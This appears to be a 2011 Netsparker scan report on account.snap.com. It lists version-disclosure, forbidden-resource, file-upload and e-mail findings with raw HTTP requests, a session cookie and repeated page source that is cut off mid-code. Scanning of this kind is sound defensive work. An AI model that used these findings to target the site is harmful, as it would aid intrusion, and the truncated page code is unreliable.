<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /javascript/on this server.</p></body></html>
OpenSSL Version Disclosure

OpenSSL Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.

Impact

An attacker can look for specific security vulnerabilities for the identified version. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /javascript/

/javascript/

https://account.snap.com/javascript/

Extracted Version

OpenSSL/0.9.7d

Request

GET /javascript/ HTTP/1.1
Referer: https://account.snap.com/javascript/tab.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 23 Jul 2011 21:07:52 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
Content-Length: 213
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /javascript/on this server.</p></body></html>
Apache Module Version Disclosure

Apache Module Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /javascript/

/javascript/

https://account.snap.com/javascript/

Extracted Version

mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8

Request

GET /javascript/ HTTP/1.1
Referer: https://account.snap.com/javascript/tab.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 23 Jul 2011 21:07:52 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
Content-Length: 213
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /javascript/on this server.</p></body></html>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /javascript/

/javascript/ CONFIRMED

https://account.snap.com/javascript/

Request

GET /javascript/ HTTP/1.1
Referer: https://account.snap.com/javascript/tab.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 23 Jul 2011 21:07:52 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
Content-Length: 213
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /javascript/on this server.</p></body></html>
File Upload Functionality Identified

File Upload Functionality Identified

1 TOTAL
INFORMATION
CONFIRMED
1
This page allows users to upload files to the web server. Upload forms are generally dangerous unless they are coded with a great deal of care. This issue is reported for information only. If there is any other vulnerability identified regarding this resource Netsparker will report it as a separate issue.
- /signup.php

/signup.php CONFIRMED

https://account.snap.com/signup.php

Form Name

logo_input

Request

GET /signup.php HTTP/1.1
Referer: https://account.snap.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 21:07:52 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script><script type='text/javascript'>function toggle_section(num) { si = document.getElementById('section_'+num+'_img'); sd = document.getElementById('section_'+num+'_div'); sm = document.getElementById('section_'+num+'_more'); if (si.src.indexOf('/images/icon-more.gif') >= 0) { sd.style.display = 'inline'; sm.style.display = 'none'; si.src = '/images/icon-less.gif'; } else { sd.style.display = 'none'; sm.style.display = 'inline'; si.src = '/images/icon-more.gif'; }}</script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script>var currentTab = 'customize';</script><div id="tip1" class="tooltip">With this option enabled, a small icon will be added at <br />the end of your active links, signaling to your users <br />which of your links have Snap Shots and which do not.</div> <div id="tip2" class="tooltip">With this option enabled, the trigger hot-zone for the Snap Shots <br />will be limited to the link icon only, which in turn will decrease <br />the chances of your users accidentally triggering Snap Shots.</div><div id="tip3" class="tooltip">With this option enabled, Snap Shots will be enabled for links <br />pointing to pages on your own site. Not recommended for sites <br />where all pages look the same, unless they have RSS.</div><div id="tip4" class="tooltip">With this option enabled, all Shots on your site will be displayed <br />as the default thumbnail screen-capture. Selecting this option <br />severely limits the level of interactivity of Snap Shots.</div><div id="tip5" class="tooltip">With this option enabled, Snap Shots will be enabled for links <br />pointing to pages on other sites.</div><script type="text/javascript">/* Prototype JavaScript framework, version 1.4.0 * (c) 2005 Sam Stephenson <sam@conio.net> * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype web site: http://prototype.conio.net/ */*--------------------------------------------------------------------------*/var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)', emptyFunction: function() {}, K: function(x) {return x}}var Class = { create: function() { return function() { this.initialize.apply(this, arguments); } }}var Abstract = new Object();Object.extend = function (destination, source) { for (property in source) { destination[property] = source[property]; } return destination;}Object.inspect = function(object) { try { if (object == undefined) return 'undefined'; if (object == null) return 'null'; return object.inspect ? object.inspect() : object.toString(); } catch (e) { if (e instanceof RangeError) return '...'; throw e; }}/*** XXX: the default prototype bind leaks memory like a sieve *** XXX: see prototype_extensions.js for the safe version */Function.prototype.bind = function() { var __method = this, args = $A(arguments), object = args.shift(); return function() { return __method.apply(object, args.concat($A(arguments))); }}/***/Function.prototype.bindAsEventListener = function(object) { var __method = this; return function(event) { return __method.call(object, event || window.event); }}Object.extend(Number.prototype, { toColorPart: function() { var digits = this.toString(16); if (this < 16) return '0' + digits; return digits; }, succ: function() { return this + 1; }, times: function(iterator) { $R(0, this, true).each(iterator); return this; }});var Try = { these: function() { var returnValue; for (var i = 0; i < arguments.length; i++) { var lambda = arguments[i]; try { returnValue = lambda(); break; } catch (e) {} } return returnValue; }}/*** SnapShot ***/SnapShot = Class.create();Object.extend(SnapShot.prototype, { initialize: function () { this.time = new Array(); }, store: function () { var index = this.time.length; this.time[index] = new Date();// this.time[index].start_time = new Date(); }, reset: function () { this.time = new Array(); }, // the elapsed time of the watch. if the watch hasn't been stopped, get the time that has elapsed so far peek: function () { }, alert: function () { window.alert(this.peek()); }});MultiSnapShot = Class.create();Object.extend(MultiSnapShot.prototype, { initialize: function() { this.watches = {}; }, store: function(w) { if (! this.watches[w]) this.watches[w] = new SnapShot(); this.watches[w].store(); }, reset_all: function() { this.watches = {}; }, output: function() { str = ''; for (var w in this.watches) { if (typeof w != 'function') { for (var i = 0; i < this.watches[w].time.length; i++) { str += '&'+w+'_'+i+'='+this.watches[w].time[i].getTime(); } } } return str; }});/*--------------------------------------------------------------------------*/var PeriodicalExecuter = Class.create();PeriodicalExecuter.prototype = { initialize: function(callback, frequency) { this.callback = callback; this.frequency = frequency; this.currentlyExecuting = false; this.registerCallback(); }, registerCallback: function() { setInterval(this.onTimerEvent.bind(this), this.frequency * 1000); }, onTimerEvent: function() { if (!this.currentlyExecuting) { try { this.currentlyExecuting = true; this.callback(); } finally { this.currentlyExecuting = false; } } }}/*--------------------------------------------------------------------------*/function $() { var elements = new Array(); for (var i = 0; i < arguments.length; i++) { var element = arguments[i]; if (typeof element == 'string') element = document.getElementById(element); if (arguments.length == 1) return element; elements.push(element); } return elements;}Object.extend(String.prototype, { stripTags: function() { return this.replace(/<\/?[^>]+>/gi, ''); }, stripScripts: function() { return this.replace(new RegExp(Prototype.ScriptFragment, 'img'), ''); }, extractScripts: function() { var matchAll = new RegExp(Prototype.ScriptFragment, 'img'); var matchOne = new RegExp(Prototype.ScriptFragment, 'im'); return (this.match(matchAll) || []).map(function(scriptTag) { return (scriptTag.match(matchOne) || ['', ''])[1]; }); }, evalScripts: function() { return this.extractScripts().map(eval); },/* escapeHTML: function() { var div = document.createElement('div'); var text = document.createTextNode(this); div.appendChild(text); return div.innerHTML; }, *//* unescapeHTML: function() { var div = document.createElement('div'); div.innerHTML = this.stripTags(); return div.childNodes[0] ? div.childNodes[0].nodeValue : ''; }, */ toQueryParams: function() { var pairs = this.match(/^\??(.*)$/)[1].split('&'); return pairs.inject({}, function(params, pairString) { var pair = pairString.split('='); params[pair[0]] = pair[1]; return params; }); }, toArray: function() { return this.split(''); }, camelize: function() { var oStringList = this.split('-'); if (oStringList.length == 1) return oStringList[0]; var camelizedString = this.indexOf('-') == 0 ? oStringList[0].charAt(0).toUpperCase() + oStringList[0].substring(1) : oStringList[0]; for (var i = 1, len = oStringList.length; i < len; i++) { var s = oStringList[i]; camelizedString += s.charAt(0).toUpperCase() + s.substring(1); } return camelizedString; }, inspect: function() { return "'" + this.replace('\\', '\\\\').replace("'", '\\\'') + "'"; }});String.prototype.parseQuery = String.prototype.toQueryParams;var $break = new Object();var $continue = new Object();var Enumerable = { each: function(iterator) { var index = 0; try { this._each(function(value) { try { iterator(value, index++); } catch (e) { if (e != $continue) throw e; } }); } catch (e) { if (e != $break) throw e; } }, all: function(iterator) { var result = true; this.each(function(value, index) { result = result && !!(iterator || Prototype.K)(value, index); if (!result) throw $break; }); return result; }, any: function(iterator) { var result = true; this.each(function(value, index) { if (result = !!(iterator || Prototype.K)(value, index)) throw $break; }); return result; }, collect: function(iterator) { var results = []; this.each(function(value, index) { results.push(iterator(value, index)); }); return results; }, detect: function (iterator) { var result; this.each(function(value, index) { if (iterator(value, index)) { result = value; throw $break; } }); return result; }, findAll: function(iterator) { var results = []; this.each(function(value, index) { if (iterator(value, index)) results.push(value); }); return results; },/* grep: function(pattern, iterator) { var results = []; this.each(function(value, index) { var stringValue = value.toString(); if (stringValue.match(pattern)) results.push((iterator || Prototype.K)(value, index)); }) return results; }, */ include: function(object) { var found = false; this.each(function(value) { if (value == object) { found = true; throw $break; } }); return found; }, inject: function(memo, iterator) { this.each(function(value, index) { memo = iterator(memo, value, index); }); return memo; },/* invoke: function(method) { var args = $A(arguments).slice(1); return this.collect(function(value) { return value[method].apply(value, args); }); }, */ max: function(iterator) { var result; this.each(function(value, index) { value = (iterator || Prototype.K)(value, index); if (value >= (result || value)) result = value; }); return result; }, min: function(iterator) { var result; this.each(function(value, index) { value = (iterator || Prototype.K)(value, index); if (value <= (result || value)) result = value; }); return result; }, partition: function(iterator) { var trues = [], falses = []; this.each(function(value, index) { ((iterator || Prototype.K)(value, index) ? trues : falses).push(value); }); return [trues, falses]; }, pluck: function(property) { var results = []; this.each(function(value, index) { results.push(value[property]); }); return results; }, reject: function(iterator) { var results = []; this.each(function(value, index) { if (!iterator(value, index)) results.push(value); }); return results; },/* sortBy: function(iterator) { return this.collect(function(value, index) { return {value: value, criteria: iterator(value, index)}; }).sort(function(left, right) { var a = left.criteria, b = right.criteria; return a < b ? -1 : a > b ? 1 : 0; }).pluck('value'); }, */ toArray: function() { return this.collect(Prototype.K); }, zip: function() { var iterator = Prototype.K, args = $A(arguments); if (typeof args.last() == 'function') iterator = args.pop(); var collections = [this].concat(args).map($A); return this.map(function(value, index) { iterator(value = collections.pluck(index)); return value; }); }, inspect: function() { return '#<Enumerable:' + this.toArray().inspect() + '>'; }}Object.extend(Enumerable, { map: Enumerable.collect, find: Enumerable.detect, select: Enumerable.findAll, member: Enumerable.include, entries: Enumerable.toArray});var $A = Array.from = function(iterable) { if (!iterable) return []; if (iterable.toArray) { return iterable.toArray(); } else { var results = []; for (var i = 0; i < iterable.length; i++) results.push(iterable[i]); return results; }}Object.extend(Array.prototype, Enumerable);Array.prototype._reverse = Array.prototype.reverse;Object.extend(Array.prototype, { _each: function(iterator) { for (var i = 0; i < this.length; i++) iterator(this[i]); }, clear: function() { this.length = 0; return this; }, first: function() { return this[0]; }, last: function() { return this[this.length - 1]; }, compact: function() { return this.select(function(value) { return value != undefined || value != null; }); }, flatten: function() { return this.inject([], function(array, value) { return array.concat(value.constructor == Array ? value.flatten() : [value]); }); }, without: function() { var values = $A(arguments); return this.select(function(value) { return !values.include(value); }); }, indexOf: function(object) { for (var i = 0; i < this.length; i++) if (this[i] == object) return i; return -1; }, reverse: function(inline) { return (inline !== false ? this : this.toArray())._reverse(); }, shift: function() { var result = this[0]; for (var i = 0; i < this.length - 1; i++) this[i] = this[i + 1]; this.length--; return result; }, inspect: function() { return '[' + this.map(Object.inspect).join(', ') + ']'; }});var Hash = { _each: function(iterator) { for (key in this) { var value = this[key]; if (typeof value == 'function') continue; var pair = [key, value]; pair.key = key; pair.value = value; iterator(pair); } }, keys: function() { return this.pluck('key'); }, values: function() { return this.pluck('value'); }, merge: function(hash) { return $H(hash).inject($H(this), function(mergedHash, pair) { mergedHash[pair.key] = pair.value; return mergedHash; }); },/* toQueryString: function() { return this.map(function(pair) { return pair.map(encodeURIComponent).join('='); }).join('&'); }, */ inspect: function() { return '#<Hash:{' + this.map(function(pair) { return pair.map(Object.inspect).join(': '); }).join(', ') + '}>'; }}function $H(object) { var hash = Object.extend({}, object || {}); Object.extend(hash, Enumerable); Object.extend(hash, Hash); return hash;}ObjectRange = Class.create();Object.extend(ObjectRange.prototype, Enumerable);Object.extend(ObjectRange.prototype, { initialize: function(start, end, exclusive) { this.start = start; this.end = end; this.exclusive = exclusive; }, _each: function(iterator) { var value = this.start; do { iterator(value); value = value.succ(); } while (this.include(value)); }, include: function(value) { if (value < this.start) return false; if (this.exclusive) return value < this.end; return value <= this.end; }});var $R = function(start, end, exclusive) { return new ObjectRange(start, end, exclusive);}var Ajax = { getTransport: function() { return Try.these( function() {return new ActiveXObject('Msxml2.XMLHTTP')}, function() {return new ActiveXObject('Microsoft.XMLHTTP')}, function() {return new XMLHttpRequest()} ) || false; }, activeRequestCount: 0}Ajax.Responders = { responders: [], _each: function(iterator) { this.responders._each(iterator); }, register: function(responderToAdd) { if (!this.include(responderToAdd)) this.responders.push(responderToAdd); }, unregister: function(responderToRemove) { this.responders = this.responders.without(responderToRemove); }, dispatch: function(callback, request, transport, json) { this.each(function(responder) { if (responder[callback] && typeof responder[callback] == 'function') { try { responder[callback].apply(responder, [request, transport, json]); } catch (e) {} } }); }};Object.extend(Ajax.Responders, Enumerable);Ajax.Responders.register({ onCreate: function() { Ajax.activeRequestCount++; }, onComplete: function() { Ajax.activeRequestCount--; }});Ajax.Base = function() {};Ajax.Base.prototype = { setOptions: function(options) { this.options = { method: 'post', asynchronous: true, parameters: '' } Object.extend(this.options, options || {}); }, responseIsSuccess: function() { return this.transport.status == undefined || this.transport.status == 0 || (this.transport.status >= 200 && this.transport.status < 300); }, responseIsFailure: function() { return !this.responseIsSuccess(); }}Ajax.Request = Class.create();Ajax.Request.Events = ['Uninitialized', 'Loading', 'Loaded', 'Interactive', 'Complete'];Ajax.Request.prototype = Object.extend(new Ajax.Base(), { initialize: function(url, options) { this.transport = Ajax.getTransport(); this.setOptions(options); this.request(url); }, request: function(url) { var parameters = this.options.parameters || ''; // XXX: commented out by Barry because he has no concept of how this could be relevant (03/02/2006) // if (parameters.length > 0) parameters += '&_='; try { this.url = url; if (this.options.method == 'get' && parameters.length > 0) this.url += (this.url.match(/\?/) ? '&' : '?') + parameters; Ajax.Responders.dispatch('onCreate', this, this.transport); this.transport.open(this.options.method, this.url, this.options.asynchronous); if (this.options.asynchronous) { this.transport.onreadystatechange = this.onStateChange.bind(this); setTimeout((function() {this.respondToReadyState(1)}).bind(this), 10); } this.setRequestHeaders(); var body = this.options.postBody ? this.options.postBody : parameters; this.transport.send(this.options.method == 'post' ? body : null); } catch (e) { this.dispatchException(e); } }, setRequestHeaders: function() { var requestHeaders = ['X-Requested-With', 'XMLHttpRequest', 'X-Prototype-Version', Prototype.Version]; if (this.options.method == 'post') { requestHeaders.push('Content-type', 'application/x-www-form-urlencoded'); /* Force "Connection: close" for Mozi..
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /signup.php

/signup.php

https://account.snap.com/signup.php

Found E-mails

sam@conio.net

Request

GET /signup.php HTTP/1.1
Referer: https://account.snap.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 21:07:52 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script><script type='text/javascript'>function toggle_section(num) { si = document.getElementById('section_'+num+'_img'); sd = document.getElementById('section_'+num+'_div'); sm = document.getElementById('section_'+num+'_more'); if (si.src.indexOf('/images/icon-more.gif') >= 0) { sd.style.display = 'inline'; sm.style.display = 'none'; si.src = '/images/icon-less.gif'; } else { sd.style.display = 'none'; sm.style.display = 'inline'; si.src = '/images/icon-more.gif'; }}</script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script>var currentTab = 'customize';</script><div id="tip1" class="tooltip">With this option enabled, a small icon will be added at <br />the end of your active links, signaling to your users <br />which of your links have Snap Shots and which do not.</div> <div id="tip2" class="tooltip">With this option enabled, the trigger hot-zone for the Snap Shots <br />will be limited to the link icon only, which in turn will decrease <br />the chances of your users accidentally triggering Snap Shots.</div><div id="tip3" class="tooltip">With this option enabled, Snap Shots will be enabled for links <br />pointing to pages on your own site. Not recommended for sites <br />where all pages look the same, unless they have RSS.</div><div id="tip4" class="tooltip">With this option enabled, all Shots on your site will be displayed <br />as the default thumbnail screen-capture. Selecting this option <br />severely limits the level of interactivity of Snap Shots.</div><div id="tip5" class="tooltip">With this option enabled, Snap Shots will be enabled for links <br />pointing to pages on other sites.</div><script type="text/javascript">/* Prototype JavaScript framework, version 1.4.0 * (c) 2005 Sam Stephenson <sam@conio.net> * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype web site: http://prototype.conio.net/ */*--------------------------------------------------------------------------*/var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)', emptyFunction: function() {}, K: function(x) {return x}}var Class = { create: function() { return function() { this.initialize.apply(this, arguments); } }}var Abstract = new Object();Object.extend = function (destination, source) { for (property in source) { destination[property] = source[property]; } return destination;}Object.inspect = function(object) { try { if (object == undefined) return 'undefined'; if (object == null) return 'null'; return object.inspect ? object.inspect() : object.toString(); } catch (e) { if (e instanceof RangeError) return '...'; throw e; }}/*** XXX: the default prototype bind leaks memory like a sieve *** XXX: see prototype_extensions.js for the safe version */Function.prototype.bind = function() { var __method = this, args = $A(arguments), object = args.shift(); return function() { return __method.apply(object, args.concat($A(arguments))); }}/***/Function.prototype.bindAsEventListener = function(object) { var __method = this; return function(event) { return __method.call(object, event || window.event); }}Object.extend(Number.prototype, { toColorPart: function() { var digits = this.toString(16); if (this < 16) return '0' + digits; return digits; }, succ: function() { return this + 1; }, times: function(iterator) { $R(0, this, true).each(iterator); return this; }});var Try = { these: function() { var returnValue; for (var i = 0; i < arguments.length; i++) { var lambda = arguments[i]; try { returnValue = lambda(); break; } catch (e) {} } return returnValue; }}/*** SnapShot ***/SnapShot = Class.create();Object.extend(SnapShot.prototype, { initialize: function () { this.time = new Array(); }, store: function () { var index = this.time.length; this.time[index] = new Date();// this.time[index].start_time = new Date(); }, reset: function () { this.time = new Array(); }, // the elapsed time of the watch. if the watch hasn't been stopped, get the time that has elapsed so far peek: function () { }, alert: function () { window.alert(this.peek()); }});MultiSnapShot = Class.create();Object.extend(MultiSnapShot.prototype, { initialize: function() { this.watches = {}; }, store: function(w) { if (! this.watches[w]) this.watches[w] = new SnapShot(); this.watches[w].store(); }, reset_all: function() { this.watches = {}; }, output: function() { str = ''; for (var w in this.watches) { if (typeof w != 'function') { for (var i = 0; i < this.watches[w].time.length; i++) { str += '&'+w+'_'+i+'='+this.watches[w].time[i].getTime(); } } } return str; }});/*--------------------------------------------------------------------------*/var PeriodicalExecuter = Class.create();PeriodicalExecuter.prototype = { initialize: function(callback, frequency) { this.callback = callback; this.frequency = frequency; this.currentlyExecuting = false; this.registerCallback(); }, registerCallback: function() { setInterval(this.onTimerEvent.bind(this), this.frequency * 1000); }, onTimerEvent: function() { if (!this.currentlyExecuting) { try { this.currentlyExecuting = true; this.callback(); } finally { this.currentlyExecuting = false; } } }}/*--------------------------------------------------------------------------*/function $() { var elements = new Array(); for (var i = 0; i < arguments.length; i++) { var element = arguments[i]; if (typeof element == 'string') element = document.getElementById(element); if (arguments.length == 1) return element; elements.push(element); } return elements;}Object.extend(String.prototype, { stripTags: function() { return this.replace(/<\/?[^>]+>/gi, ''); }, stripScripts: function() { return this.replace(new RegExp(Prototype.ScriptFragment, 'img'), ''); }, extractScripts: function() { var matchAll = new RegExp(Prototype.ScriptFragment, 'img'); var matchOne = new RegExp(Prototype.ScriptFragment, 'im'); return (this.match(matchAll) || []).map(function(scriptTag) { return (scriptTag.match(matchOne) || ['', ''])[1]; }); }, evalScripts: function() { return this.extractScripts().map(eval); },/* escapeHTML: function() { var div = document.createElement('div'); var text = document.createTextNode(this); div.appendChild(text); return div.innerHTML; }, *//* unescapeHTML: function() { var div = document.createElement('div'); div.innerHTML = this.stripTags(); return div.childNodes[0] ? div.childNodes[0].nodeValue : ''; }, */ toQueryParams: function() { var pairs = this.match(/^\??(.*)$/)[1].split('&'); return pairs.inject({}, function(params, pairString) { var pair = pairString.split('='); params[pair[0]] = pair[1]; return params; }); }, toArray: function() { return this.split(''); }, camelize: function() { var oStringList = this.split('-'); if (oStringList.length == 1) return oStringList[0]; var camelizedString = this.indexOf('-') == 0 ? oStringList[0].charAt(0).toUpperCase() + oStringList[0].substring(1) : oStringList[0]; for (var i = 1, len = oStringList.length; i < len; i++) { var s = oStringList[i]; camelizedString += s.charAt(0).toUpperCase() + s.substring(1); } return camelizedString; }, inspect: function() { return "'" + this.replace('\\', '\\\\').replace("'", '\\\'') + "'"; }});String.prototype.parseQuery = String.prototype.toQueryParams;var $break = new Object();var $continue = new Object();var Enumerable = { each: function(iterator) { var index = 0; try { this._each(function(value) { try { iterator(value, index++); } catch (e) { if (e != $continue) throw e; } }); } catch (e) { if (e != $break) throw e; } }, all: function(iterator) { var result = true; this.each(function(value, index) { result = result && !!(iterator || Prototype.K)(value, index); if (!result) throw $break; }); return result; }, any: function(iterator) { var result = true; this.each(function(value, index) { if (result = !!(iterator || Prototype.K)(value, index)) throw $break; }); return result; }, collect: function(iterator) { var results = []; this.each(function(value, index) { results.push(iterator(value, index)); }); return results; }, detect: function (iterator) { var result; this.each(function(value, index) { if (iterator(value, index)) { result = value; throw $break; } }); return result; }, findAll: function(iterator) { var results = []; this.each(function(value, index) { if (iterator(value, index)) results.push(value); }); return results; },/* grep: function(pattern, iterator) { var results = []; this.each(function(value, index) { var stringValue = value.toString(); if (stringValue.match(pattern)) results.push((iterator || Prototype.K)(value, index)); }) return results; }, */ include: function(object) { var found = false; this.each(function(value) { if (value == object) { found = true; throw $break; } }); return found; }, inject: function(memo, iterator) { this.each(function(value, index) { memo = iterator(memo, value, index); }); return memo; },/* invoke: function(method) { var args = $A(arguments).slice(1); return this.collect(function(value) { return value[method].apply(value, args); }); }, */ max: function(iterator) { var result; this.each(function(value, index) { value = (iterator || Prototype.K)(value, index); if (value >= (result || value)) result = value; }); return result; }, min: function(iterator) { var result; this.each(function(value, index) { value = (iterator || Prototype.K)(value, index); if (value <= (result || value)) result = value; }); return result; }, partition: function(iterator) { var trues = [], falses = []; this.each(function(value, index) { ((iterator || Prototype.K)(value, index) ? trues : falses).push(value); }); return [trues, falses]; }, pluck: function(property) { var results = []; this.each(function(value, index) { results.push(value[property]); }); return results; }, reject: function(iterator) { var results = []; this.each(function(value, index) { if (!iterator(value, index)) results.push(value); }); return results; },/* sortBy: function(iterator) { return this.collect(function(value, index) { return {value: value, criteria: iterator(value, index)}; }).sort(function(left, right) { var a = left.criteria, b = right.criteria; return a < b ? -1 : a > b ? 1 : 0; }).pluck('value'); }, */ toArray: function() { return this.collect(Prototype.K); }, zip: function() { var iterator = Prototype.K, args = $A(arguments); if (typeof args.last() == 'function') iterator = args.pop(); var collections = [this].concat(args).map($A); return this.map(function(value, index) { iterator(value = collections.pluck(index)); return value; }); }, inspect: function() { return '#<Enumerable:' + this.toArray().inspect() + '>'; }}Object.extend(Enumerable, { map: Enumerable.collect, find: Enumerable.detect, select: Enumerable.findAll, member: Enumerable.include, entries: Enumerable.toArray});var $A = Array.from = function(iterable) { if (!iterable) return []; if (iterable.toArray) { return iterable.toArray(); } else { var results = []; for (var i = 0; i < iterable.length; i++) results.push(iterable[i]); return results; }}Object.extend(Array.prototype, Enumerable);Array.prototype._reverse = Array.prototype.reverse;Object.extend(Array.prototype, { _each: function(iterator) { for (var i = 0; i < this.length; i++) iterator(this[i]); }, clear: function() { this.length = 0; return this; }, first: function() { return this[0]; }, last: function() { return this[this.length - 1]; }, compact: function() { return this.select(function(value) { return value != undefined || value != null; }); }, flatten: function() { return this.inject([], function(array, value) { return array.concat(value.constructor == Array ? value.flatten() : [value]); }); }, without: function() { var values = $A(arguments); return this.select(function(value) { return !values.include(value); }); }, indexOf: function(object) { for (var i = 0; i < this.length; i++) if (this[i] == object) return i; return -1; }, reverse: function(inline) { return (inline !== false ? this : this.toArray())._reverse(); }, shift: function() { var result = this[0]; for (var i = 0; i < this.length - 1; i++) this[i] = this[i + 1]; this.length--; return result; }, inspect: function() { return '[' + this.map(Object.inspect).join(', ') + ']'; }});var Hash = { _each: function(iterator) { for (key in this) { var value = this[key]; if (typeof value == 'function') continue; var pair = [key, value]; pair.key = key; pair.value = value; iterator(pair); } }, keys: function() { return this.pluck('key'); }, values: function() { return this.pluck('value'); }, merge: function(hash) { return $H(hash).inject($H(this), function(mergedHash, pair) { mergedHash[pair.key] = pair.value; return mergedHash; }); },/* toQueryString: function() { return this.map(function(pair) { return pair.map(encodeURIComponent).join('='); }).join('&'); }, */ inspect: function() { return '#<Hash:{' + this.map(function(pair) { return 